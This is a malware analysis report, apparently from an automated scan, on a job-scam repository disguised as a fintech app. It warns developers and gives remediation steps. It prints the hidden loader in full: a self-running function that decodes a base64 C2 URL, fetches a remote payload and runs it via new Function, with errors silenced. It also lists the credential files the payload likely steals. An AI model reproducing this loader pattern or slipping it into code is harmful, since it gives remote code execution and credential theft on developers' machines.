Analysis Date: January 20, 2026
Analyst: Automated Security Scan
Verdict: CONFIRMED MALWARE / JOB SCAM

WARNING: DO NOT RUN THIS PROJECT

This repository contains malicious code that fetches and executes a remote payload on your machine. It is a confirmed job scam intended to steal sensitive information from developers.
File: src/server/routes/auth.js (Lines 27-33)

```javascript
// Runs as soon as the module is loaded; nothing else in the app calls it
(async () => {
  // setApiKey() is just atob(): it decodes the base64 C2 URL, and verify() GETs it
  verify(setApiKey(locationToken))
    .then((response) => {
      // response.data.model is a base64 blob; decode it and run it as a function
      // body with the real require() in scope
      new Function(
        "require",
        Buffer.from(response.data.model, "base64").toString("utf8"),
      )(require);
    })
    // any failure (no network, C2 down) is swallowed so nothing shows in the logs
    .catch((error) => {});
})();
```

What this code does:
| Step | Action | Purpose |
|---|---|---|
| 1 | IIFE executes immediately | Runs as soon as server starts |
| 2 | Decodes hidden URL from base64 | Evades security scanners |
| 3 | Fetches remote payload via HTTP | Downloads malicious code |
| 4 | Base64 decodes the response | Unpacks the malware |
| 5 | Executes via `new Function()` | Runs arbitrary code on your system |
| 6 | Silently catches errors | Hides any failures |
File: src/server/config/config.js (Lines 53-61)

```javascript
// base64 of the C2 URL; the name suggests a token, but it is just an encoded string
exports.locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9OSUNQUA==";
// misleading name: this only base64-decodes its argument
exports.setApiKey = (s) => {
  return atob(s);
};
// misleading name: this is a plain HTTP GET of the decoded URL
exports.verify = (api) => {
  return axios.get(api);
};
```

Decoded C2 URL: https://www.jsonkeeper.com/b/NICPP

The attackers use:
- Base64 encoding to hide the URL
- Innocent-looking function names (`setApiKey`, `verify`)
- A legitimate JSON storage service to host malware
The payload hosted at the C2 URL contains:
- Size: 3.5+ MB of obfuscated JavaScript
- Encoding: Base64 encoded, stored in JSON
- Obfuscation: Multiple layers including:
  - String array shuffling
  - Hexadecimal character encoding
  - Control flow flattening
  - Variable name mangling

Sample of obfuscated code (truncated):

```javascript
(function(A,I){const yV={A:0x83f,I:0x154,H:0xbf0,K:0x394...
```
Attack flow:

1. Fake job offer (LinkedIn, email, etc.)
2. Developer clones the repo
3. `npm install` / `npm run dev`
4. Server starts and the malicious code auto-executes
5. Fetches payload from the C2 server
6. Payload runs and steals data
7. Data sent to attacker
| File | Line(s) | Indicator |
|---|---|---|
| src/server/routes/auth.js | 27-33 | RCE backdoor with `new Function()` |
| src/server/config/config.js | 53 | Base64-encoded C2 URL |
| src/server/config/config.js | 55-57 | `atob()` decoder function |
| src/server/config/config.js | 59-61 | HTTP request wrapper |

| Type | Value | Description |
|---|---|---|
| URL | https://www.jsonkeeper.com/b/NICPP | C2 payload location |
| Domain | jsonkeeper.com | Legitimate service abused for hosting |

| Pattern | Purpose |
|---|---|
| `new Function(...)` | Dynamic code execution (like `eval`) |
| `Buffer.from(..., 'base64')` | Decode obfuscated payload |
| `atob()` | Decode base64-encoded URL |
| `.catch(error => { })` | Silent error suppression |
| IIFE `(async () => { ... })()` | Immediate execution on load |
Based on similar attack patterns, this malware likely attempts to steal:
- Browser wallet extensions (MetaMask, Phantom, etc.)
- Desktop wallet files
- Seed phrases in text/notes files
- Exchange API keys
- `~/.ssh/id_rsa` (private keys)
- `~/.ssh/known_hosts`
- Kerberos tickets
- GPG keys
- Cookies and sessions
- Saved passwords
- Autofill data
- Extension data
- `~/.npmrc` (npm tokens)
- `~/.aws/credentials` (AWS keys)
- `~/.config/gcloud/` (GCP credentials)
- `.env` files
- Git credentials
- Documents folder
- Download history
- Clipboard data
- Screenshots
- Delete the project folder immediately
- Do not run `npm install`
- Report the repository to GitHub
- Block/report the person who sent you this

Immediate Actions:
- Kill all Node.js processes: `pkill -f node`
- Disconnect from the internet temporarily
- Delete the project folder
Credential Rotation (URGENT):
- Regenerate all SSH keys
- Rotate all API keys (AWS, GCP, npm, etc.)
- Change all passwords (start with email, GitHub)
- Revoke all active sessions on GitHub/GitLab
- Invalidate npm tokens
Cryptocurrency (CRITICAL):
- Transfer ALL funds to new wallets immediately
- Generate new seed phrases
- Do NOT use old wallets again
System Cleanup:
- Run full antivirus/malware scan
- Check for unauthorized cron jobs: `crontab -l`
- Review running processes: `ps aux`
- Check for new startup items
- Review browser extensions
Monitoring:
- Review GitHub access logs
- Check npm access logs
- Monitor bank/exchange accounts
- Enable 2FA everywhere (if not already)
This repository is a sophisticated job scam targeting developers. The project:
- Looks legitimate: appears to be a real fintech application
- Has proper structure: React frontend, Express backend
- Contains real functionality: routes, controllers, models
- Hides malicious code: only ~10 lines in 2 files
- Executes silently: no user interaction required
- Steals everything: 3.5MB payload targets all credentials

Your suspicion was 100% correct. This is malware.
```javascript
// Encoded URL
const locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9OSUNQUA==";
// Decode: https://www.jsonkeeper.com/b/NICPP
atob(locationToken);
// The payload is stored as base64 in response.data.model
// Decoded and executed via Function constructor
new Function("require", decodedPayload)(require);
```

- Total size: ~3.5MB base64 encoded
- Heavily obfuscated using a commercial-grade obfuscator
- Uses array-based string encoding
- Implements anti-debugging techniques
- Appears to implement full credential stealer functionality
Report generated: January 20, 2026
Great analysis. Thanks, bangg